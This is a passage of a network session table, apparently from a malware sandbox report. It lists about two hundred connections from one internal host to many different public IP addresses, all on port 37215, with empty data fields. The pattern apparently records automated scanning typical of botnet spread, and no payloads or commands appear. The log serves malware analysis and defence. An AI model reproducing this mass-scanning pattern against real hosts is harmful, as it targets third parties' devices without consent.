                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13061192.168.2.1355830157.10.106.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13062192.168.2.1339006157.163.40.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13063192.168.2.134213841.173.92.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13064192.168.2.1351364220.214.156.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13065192.168.2.1346920187.101.42.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13066192.168.2.1351398157.242.234.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13067192.168.2.1347080157.112.173.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13068192.168.2.1351204157.161.127.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13069192.168.2.1350296157.31.232.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13070192.168.2.1344798130.231.8.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13071192.168.2.1359180157.254.195.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13072192.168.2.1337910197.77.222.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13073192.168.2.133831641.63.41.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13074192.168.2.1352490209.186.26.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13075192.168.2.1347376157.32.21.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13076192.168.2.1336378157.154.173.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13077192.168.2.1346424157.65.161.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13078192.168.2.133775241.209.64.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13079192.168.2.134916241.157.86.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13080192.168.2.133876441.24.238.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13081192.168.2.1348802197.72.140.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13082192.168.2.134619841.107.153.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13083192.168.2.1355224197.41.47.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13084192.168.2.1342366197.233.184.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13085192.168.2.134170641.254.13.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13086192.168.2.1357978157.207.99.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13087192.168.2.1355758157.100.131.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13088192.168.2.1356210128.130.121.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13089192.168.2.1359796163.44.42.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13090192.168.2.1356942197.229.205.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13091192.168.2.135355441.208.23.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13092192.168.2.1350930157.207.28.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13093192.168.2.134929041.44.198.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13094192.168.2.1349354157.46.122.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13095192.168.2.134151641.211.219.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13096192.168.2.1338996157.219.139.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13097192.168.2.1356248157.166.11.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13098192.168.2.135656841.25.206.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13099192.168.2.1353088197.57.109.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13100192.168.2.134222641.67.33.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13101192.168.2.1344214197.45.163.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13102192.168.2.1345092197.12.88.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13103192.168.2.1357366197.60.55.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13104192.168.2.134258041.124.54.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13105192.168.2.135414637.242.138.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13106192.168.2.135143841.181.59.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13107192.168.2.134432641.52.213.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13108192.168.2.1359008197.116.71.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13109192.168.2.1355770157.17.68.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13110192.168.2.1357186157.3.112.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13111192.168.2.1359920197.121.221.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13112192.168.2.1339606157.205.204.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13113192.168.2.133374041.241.96.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13114192.168.2.1354218136.38.4.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13115192.168.2.1342810157.175.224.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13116192.168.2.135908232.121.19.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13117192.168.2.1359190157.39.241.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13118192.168.2.1348512197.241.155.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13119192.168.2.133732841.241.203.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13120192.168.2.1360666157.18.169.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13121192.168.2.134165241.21.79.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13122192.168.2.1352668213.52.169.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13123192.168.2.1342766157.131.123.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13124192.168.2.1351796197.165.223.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13125192.168.2.134419882.151.164.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13126192.168.2.135440641.80.113.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13127192.168.2.1355976157.75.96.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13128192.168.2.1355062132.32.38.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13129192.168.2.1352028197.12.167.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13130192.168.2.1346796166.84.81.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13131192.168.2.1333364197.118.207.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13132192.168.2.134185686.63.199.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13133192.168.2.135844241.68.248.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13134192.168.2.133434834.195.183.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13135192.168.2.1360470105.161.160.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13136192.168.2.135380834.111.5.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13137192.168.2.1346604157.138.197.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13138192.168.2.1348368145.38.17.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13139192.168.2.1360368197.221.101.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13140192.168.2.135832641.145.23.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13141192.168.2.133442441.107.250.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13142192.168.2.1334046139.129.172.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13143192.168.2.1344772197.202.180.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13144192.168.2.1336666109.93.38.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13145192.168.2.1337320157.12.82.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13146192.168.2.134646441.64.248.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13147192.168.2.135105441.83.215.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13148192.168.2.1347582197.212.39.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13149192.168.2.1357084157.187.19.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13150192.168.2.1356732157.130.129.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13151192.168.2.1357076101.203.166.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13152192.168.2.1338000197.69.192.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13153192.168.2.135681641.64.174.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13154192.168.2.1352856197.93.217.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13155192.168.2.1340990197.44.153.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13156192.168.2.1354492124.246.157.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13157192.168.2.1346522197.232.240.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13158192.168.2.1342570154.86.115.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13159192.168.2.1352634157.208.191.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13160192.168.2.1346550157.153.237.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13161192.168.2.133348841.22.60.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13162192.168.2.135443241.151.15.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13163192.168.2.1334960197.138.156.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13164192.168.2.134780841.117.208.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13165192.168.2.135146641.6.103.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13166192.168.2.1336110151.69.254.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13167192.168.2.134211241.164.1.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13168192.168.2.1358020197.220.121.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13169192.168.2.1339680157.171.184.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13170192.168.2.134248041.2.70.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13171192.168.2.1346340181.226.77.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13172192.168.2.135602441.7.161.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13173192.168.2.1341766197.202.18.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13174192.168.2.1342208167.119.60.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13175192.168.2.1348782189.153.254.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13176192.168.2.136025858.11.206.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13177192.168.2.1346144197.32.88.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13178192.168.2.1338766197.163.107.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13179192.168.2.1353676207.64.168.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13180192.168.2.1341338197.131.131.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13181192.168.2.1346546116.215.211.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13182192.168.2.135296841.13.175.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13183192.168.2.133644041.3.160.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13184192.168.2.134537841.179.33.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13185192.168.2.1348662197.225.132.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13186192.168.2.134080241.121.222.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13187192.168.2.1347696197.44.154.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13188192.168.2.136074690.9.153.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13189192.168.2.1350546157.202.81.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13190192.168.2.133541041.242.148.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13191192.168.2.1340492204.100.248.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13192192.168.2.1350054170.216.206.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13193192.168.2.1356132157.48.225.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13194192.168.2.1341332157.181.100.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13195192.168.2.134240441.95.54.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13196192.168.2.1354652197.13.252.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13197192.168.2.1348756157.113.131.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13198192.168.2.1339084197.174.87.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13199192.168.2.134751636.190.158.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13200192.168.2.1342398157.60.169.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13201192.168.2.1360244197.11.121.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13202192.168.2.134312441.200.54.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13203192.168.2.1360804197.253.105.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13204192.168.2.1358046207.33.113.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13205192.168.2.1346080157.227.117.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13206192.168.2.134062417.98.196.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13207192.168.2.136061241.220.191.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13208192.168.2.134193241.109.56.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13209192.168.2.1335410209.97.101.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13210192.168.2.1356646113.104.33.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13211192.168.2.1336176157.240.129.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13212192.168.2.1360650157.103.123.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13213192.168.2.1356302193.80.107.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13214192.168.2.1353754103.208.173.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13215192.168.2.135535841.133.161.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13216192.168.2.1355098157.207.38.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13217192.168.2.1358030157.42.130.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13218192.168.2.135302427.121.224.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13219192.168.2.1350406173.103.197.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13220192.168.2.1356484122.181.255.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13221192.168.2.1351398157.226.171.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13222192.168.2.1343540157.128.131.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13223192.168.2.134461441.123.67.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13224192.168.2.1347894197.61.166.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13225192.168.2.1353974147.47.226.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13226192.168.2.134417636.28.178.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13227192.168.2.1357772197.22.152.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13228192.168.2.135410441.18.7.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13229192.168.2.135764241.181.23.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13230192.168.2.1360162142.132.79.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13231192.168.2.1333578197.102.121.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13232192.168.2.1345790197.244.44.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13233192.168.2.1359298157.11.177.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13234192.168.2.1342676157.146.139.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13235192.168.2.1360686197.44.51.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13236192.168.2.134685041.215.24.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13237192.168.2.134431241.78.204.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13238192.168.2.1333056157.206.246.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13239192.168.2.1337774157.93.128.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13240192.168.2.1360818157.236.190.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13241192.168.2.1337756157.70.108.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13242192.168.2.1357200157.80.199.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13243192.168.2.1351754157.188.150.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13244192.168.2.135336441.7.174.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13245192.168.2.135525841.149.223.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13246192.168.2.135851613.97.125.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13247192.168.2.1345924157.36.202.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13248192.168.2.1353144197.85.25.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13249192.168.2.133401041.241.254.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13250192.168.2.134875041.39.70.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13251192.168.2.134708041.137.118.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13252192.168.2.1349626157.135.210.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13253192.168.2.134279441.76.175.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13254192.168.2.135503850.168.166.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13255192.168.2.134708641.100.206.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13256192.168.2.135606841.94.95.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13257192.168.2.134753441.189.122.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13258192.168.2.134092041.203.28.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13259192.168.2.1341034157.65.164.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13260192.168.2.134661641.138.255.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13261192.168.2.1346996188.188.231.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13262192.168.2.1348172216.48.79.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13263192.168.2.134670241.191.198.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13264192.168.2.1351006123.32.174.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13265192.168.2.1349018157.215.244.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13266192.168.2.1334566157.175.197.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13267192.168.2.1342750157.118.38.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13268192.168.2.1359280137.111.128.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13269192.168.2.135554641.146.74.5737215
                                                  TimestampBytes transferredDirectionData


